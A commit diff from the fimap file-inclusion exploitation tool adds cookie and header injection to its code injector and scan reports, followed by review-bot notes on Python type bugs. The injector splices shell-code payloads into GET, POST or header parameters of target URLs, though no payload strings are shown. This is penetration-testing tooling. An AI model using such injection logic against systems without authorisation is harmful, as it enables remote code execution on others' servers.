Commit ccc2a061 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Cookie\Header attacking implemented. Needs testing a bit.

parent ae09f929
...@@ -82,7 +82,7 @@ class codeinjector(baseClass): ...@@ -82,7 +82,7 @@ class codeinjector(baseClass):
if (kernel == ""): kernel = None if (kernel == ""): kernel = None
payload = "%s%s%s" %(prefix, shcode, suffix) payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0): if (ispost == 0):
path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload)) fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1): elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload)) postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2): elif (ispost == 2):
...@@ -93,7 +93,7 @@ class codeinjector(baseClass): ...@@ -93,7 +93,7 @@ class codeinjector(baseClass):
sys_inject_works = False sys_inject_works = False
working_shell = None working_shell = None
url = "http://%s%s" %(hostname, path) url = "http://%s%s" %(hostname, fpath)
code = None code = None
...@@ -617,17 +617,19 @@ class codeinjector(baseClass): ...@@ -617,17 +617,19 @@ class codeinjector(baseClass):
file = n.getAttribute("file") file = n.getAttribute("file")
param = n.getAttribute("param") param = n.getAttribute("param")
mode = n.getAttribute("mode") mode = n.getAttribute("mode")
ispost = n.getAttribute("ispost")=="1" ispost = int(n.getAttribute("ispost"))
if (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] not in ("ftp", "local")): if (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] not in ("ftp", "local")):
doRemoteWarn = True doRemoteWarn = True
if (mode.find("x") != -1 or (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] in ("ftp", "local"))): if (mode.find("x") != -1 or (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] in ("ftp", "local"))):
choose[idx] = n choose[idx] = n
if (ispost==1): if (ispost == 0):
textarr.append("[%d] URL: '%s' injecting file: '%s' using POST-param: '%s'" %(idx, path, file, param)) textarr.append("[%d] URL: '%s' injecting file: '%s' using POST-param: '%s'" %(idx, path, file, param))
else: elif (ispost == 1):
textarr.append("[%d] URL: '%s' injecting file: '%s' using GET-param: '%s'" %(idx, path, file, param)) textarr.append("[%d] URL: '%s' injecting file: '%s' using GET-param: '%s'" %(idx, path, file, param))
elif (ispost == 2):
textarr.append("[%d] URL: '%s' injecting file: '%s' using HEADER-param: '%s'" %(idx, path, file, param))
idx = idx +1 idx = idx +1
if (idx == 1): if (idx == 1):
......
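Review bot: `ispost = int(n.getAttribute("ispost"))` at the top of the third hunk raises ValueError when the attribute is absent or empty, which DOM-style getAttribute normally reports as `""`; the previous `== "1"` comparison tolerated that and treated it as a GET parameter. Defaulting explicitly preserves the old behaviour: `ispost = int(n.getAttribute("ispost") or 0)`. The new three-way `if/elif` on ispost also has no final `else`, so an unexpected value appears to still store `choose[idx] = n` while appending nothing to textarr, leaving the numbered menu out of step with choose; an `else` that logs the value or raises would surface that. The enclosing method starts and ends outside the hunk.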
...@@ -31,8 +31,6 @@ import language ...@@ -31,8 +31,6 @@ import language
import sys,os import sys,os
import tarfile, tempfile import tarfile, tempfile
import shutil import shutil
# To change this template, choose Tools | Templates
# and open the template in the editor.
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)" __author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$30.08.2009 19:57:21$" __date__ ="$30.08.2009 19:57:21$"
...@@ -93,7 +91,8 @@ def show_help(AndQuit=False): ...@@ -93,7 +91,8 @@ def show_help(AndQuit=False):
print " -P , --post=POSTDATA The POSTDATA you want to send. All variables inside" print " -P , --post=POSTDATA The POSTDATA you want to send. All variables inside"
print " will also be scanned for file inclusion bugs." print " will also be scanned for file inclusion bugs."
print " --cookie=COOKIE Define the cookie which should be send with each request." print " --cookie=COOKIE Define the cookie which should be send with each request."
print " Also the cookie will be scanned for file inclusion bugs." print " Also the cookies will be scanned for file inclusion bugs."
print " Multiple cookies should be concat with ';'."
print " --ttl=SECONDS Define the TTL (in seconds) for requests. Default is 30 seconds." print " --ttl=SECONDS Define the TTL (in seconds) for requests. Default is 30 seconds."
print " --no-auto-detect Use this switch if you don't want to let fimap automaticly detect" print " --no-auto-detect Use this switch if you don't want to let fimap automaticly detect"
print " the target language in blind-mode. In that case you will get some" print " the target language in blind-mode. In that case you will get some"
...@@ -597,7 +596,7 @@ if __name__ == "__main__": ...@@ -597,7 +596,7 @@ if __name__ == "__main__":
sys.exit(1) sys.exit(1)
if (config["p_monkeymode"] == True): if (config["p_monkeymode"] == True):
print "Experimental blind FI-error checking enabled." print "Blind FI-error checking enabled."
......
...@@ -57,23 +57,22 @@ class singleScan(baseClass): ...@@ -57,23 +57,22 @@ class singleScan(baseClass):
header = "[%d] Possible File Inclusion"%(idx) header = "[%d] Possible File Inclusion"%(idx)
if (report.getLanguage() != None): if (report.getLanguage() != None):
header = "[%d] Possible %s-File Inclusion"%(idx, report.getLanguage()) header = "[%d] Possible %s-File Inclusion"%(idx, report.getLanguage())
boxarr.append("::REQUEST::")
boxarr.append(" [URL] %s"%report.getURL()) boxarr.append(" [URL] %s"%report.getURL())
if (report.getPostData() != None and report.getPostData() != ""): boxarr.append(" [POST] %s"%report.getPostData()) if (report.getPostData() != None and report.getPostData() != ""): boxarr.append(" [POST] %s"%report.getPostData())
if (report.isPost == 1): if (report.getHeader() != None and report.getHeader().keys() > 0):
modkeys = ",".join(report.getHeader().keys())
boxarr.append(" [HEAD SENT] %s"%(modkeys))
boxarr.append("::VULN INFO::")
if (report.isPost == 0):
boxarr.append(" [GET PARAM] %s"%report.getVulnKey())
elif (report.isPost == 1):
boxarr.append(" [POSTPARM] %s"%report.getVulnKey()) boxarr.append(" [POSTPARM] %s"%report.getVulnKey())
elif (report.isPost == 2): elif (report.isPost == 2):
boxarr.append(" [VULN HEAD] %s"%report.getVulnHeader()) boxarr.append(" [VULN HEAD] %s"%report.getVulnHeader())
boxarr.append(" [VULN PARA] %s"%report.getVulnKey()) boxarr.append(" [VULN PARA] %s"%report.getVulnKey())
if (report.getHeader() != None and report.getHeader().keys() > 0):
modkeys = ",".join(report.getHeader().keys())
boxarr.append(" [HEAD SENT] %s"%(modkeys))
elif (report.isPost == 0):
boxarr.append(" [PARAM] %s"%report.getVulnKey())
if (report.isBlindDiscovered()): if (report.isBlindDiscovered()):
boxarr.append(" [PATH] Not received (Blindmode)") boxarr.append(" [PATH] Not received (Blindmode)")
else: else:
......
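Review bot: `report.getHeader().keys() > 0` on the new `if` line compares a list with an int; under Python 2 (this file uses print statements) that comparison is always true even for an empty list, so an empty header dict still prints a blank `[HEAD SENT]` line, and under Python 3 the same expression raises TypeError. The expression also appears in the removed lines, so moving it into the `::REQUEST::` block does not fix it. `if (report.getHeader()):` covers both the None and the empty case, or keep the explicit form with `len(report.getHeader()) > 0`. The enclosing function starts before the hunk and continues past it.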